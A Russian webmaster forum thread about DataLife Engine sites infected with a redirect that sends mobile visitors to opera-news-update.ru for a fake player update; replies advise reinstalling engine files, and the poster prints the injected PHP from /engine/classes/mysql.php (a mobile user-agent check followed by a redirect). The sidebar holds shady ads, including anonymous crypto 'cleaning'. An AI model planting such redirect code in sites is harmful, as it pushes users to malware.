Вирус на ДЛЕ сайтах
Страницы: 1 2 След.
[ Закрыто ] Вирус на ДЛЕ сайтах
Здравствуйте. Несколько моих сайтов на ДЛЕ заразились вирусом. Не могу точно определить, что за вирус и как с ним разобраться.
Во первых когда захожу на сайт с планшета на андроиде, меня редиректит на сайт opera-news-update.ru, где понятное дело мне предлагают обновить "Flow Player".

Во вторых на сайты реагирует антивирус ЕСЕТ, вердикт - вирус scrinject.b.gen, яша уже тоже заметил вирус на одном сайте, его вердикт - поведенческий анализ.

Кто знает, как исправить, помогите пожалуйста!
Дмитрий Димбровский, давайте в личку поподробнее
Открой свой магазин за 5 минут, их товары, их обслуживание, с тебя только клиенты >>> РЕГИСТРАЦИЯ <<<
Скрин выплат по запросу.
Рефералам помощь.
Дмитрий Димбровский, чистить все все файлы. Обновить двиг до 9.7 минимум + поставить патч безопасности
Не насиловать мозг. 
Самое безболезненное - перезалить поверх имеющихся (с заменой файлов)  файлы движка. 
Если не поможет (что маловероятно) искать проблему в шаблоне.
Цитата
mozambik пишет:
искать проблему в шаблоне
нет у него проблемы в шаблоне, страницы чистые, редиректит изнутри, но хеатсесс тоже чистый
Переустановите движок, восстановите файлы которые нужны для корректной работы сайта, енджи пхп оптионс и тп.  Я так чистил.
в  dbconfig.php или config.php была ведь тема уже
бр бр бр
Я переустанавливал, но у меня были бэкапы файлов и бд, обязательно делайте бэкапы.
Цитата
TEJlO11 пишет:
в dbconfig.php или config.php была ведь тема уже
там чисто
Если на хостинге не один домен, то они все будут редиректить если у основного домена в хеатсесс редирект засел. Я так тоже мучился, еле нашел причину
Обнови движок, как писали выше. И не медли с этим, я успел АГС получить пока разбирался с этой бодягой.
Все разобрался... smile:)

И так редирект мобильных устройств на сайт opera-news-update.ru, где понятное дело предлагается скачать вирусное приложение!

Чтобы отыскать вирус я юзнул тотал командер и сразу нашел ссылку на сайт вредитель.

Путь к зараженному файлу - /engine/classes/mysql.php
Сам код вируса выглядит вот так:

Код
$useragent=$_SERVER['HTTP_USER_AGENT'];
if(preg_match('/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge|maemo|midp|mmp|operam(ob|in)i|palm(os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows(ce|phone)|xda|xiino/i',$useragent)||preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|awa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r|s)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(i|ip)|hs\-c|ht(c(\-||_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(|\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(|\/)|klon|kpt|kwc\-|kyo(c|k)|le(no|xi)|lg(g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-||o|v)|zz)|mt(50|p1|v)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|)|webc|whit|wi(g|nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i',substr($useragent,0,4))){
header("Location: http://opera-news-update.ru/s/11011"); 
exit; 
}
п.с.
Всем большое спасибо за ответы. Отдельное спасибо Алексей SP, за его поддержку и дельные советы!
Не понимаю!Странные люди.
Не куда время девать? Ни своё, ни чужое?
Как минимум- пару часов на поиск и устранение.
Либо 5 минут на перезаливку файлов движка.
Эффект равнозначный.
Лёгкий путь нам ни к чему?!...smile:wall:
К тому же не факт, что обнаруженный код, единственный на сайте.
Изменено: mozambik - 19 Апреля 2013 21:42
А вы не подумали о том, что к примеру у меня сделаны куча хаков и модов? Они мне все нужны и я давно уже не помню в каких файлах я что то менял. Если я перезалью файлы движка, что будет с ними? Понятно что...
Цитата
mazesk пишет:
А вы не подумали о том, что к примеру у меня сделаны куча хаков и модов? Они мне все нужны и я давно уже не помню в каких файлах я что то менял. Если я перезалью файлы движка, что будет с ними? Понятно что...
Я, прежде чем что-либо написать, всегда думаю. Скажите, когда Вы устанавливаете хаки, моды - Вы вносите изменения в папку engine?
А именно эту папку требуется перезалить в первую очередь при обнаружении стороннего кода на сайте.
Речь не о переустановке движка, а о перезаливке файлов поверх существующих.
При перезаливке файлов движка, все сторонние файлы остаются не тронутыми
Вместо того, чтобы тратить время на поиск бяки, рациональнее  потратить время на устранение причин возникновения бяки.
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
05:20 ссылка на сайт 
22:12 Яху Скаут и китайцы - есть там вообще жизнь для новичка в 2026? 
21:57 Бесплатное получение бэклинков 
12:25 Бесплатное расширение для Chrome — проверка ссылок прямо на странице 
12:15 Ап выдачи Яндекса 8 апреля - есть движение, но интереснее что творится с AI-ответами Google 
12:13 Хватит ныть про смерть сайтов и нейроответы - почему мы всё еще в деле 
12:11 С чего сейчас проще начать? 
07:17 HH.ru Работадателя вериф 
04:18 От $0.015 за IP | $0.68 за ГБ | 9PROXY.COM | 20+ млн резидентных прокси | 99,95% аптайм | Без чёрных списков 
23:11 TETChange-Обменник криптовалют 
21:52 [Comcash.io] Анонимный обмен и чистка крипты без AML/KYC 
15:41 Trustpilot Reviews | Подниму рейтинг вашей компании 
15:40 Продвижение YouTube видео в топ поиска | Любой тип контента | Гарантия результата 
15:39 №1 Рассылка / Инвайтинг [TELEGRAM] | Приватный метод 
08:43 Добро пожаловать в цифровой мир... 
06:38 Точные прогнозы на футбол 
22:16 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
22:08 Во Франции начали штрафовать за IPTV - до 300-400 евро уже прилетает обычным пользователям 
22:05 Всех с праздником! 
21:56 Сайты Рунета 
15:42 Список обновленных тем пуст...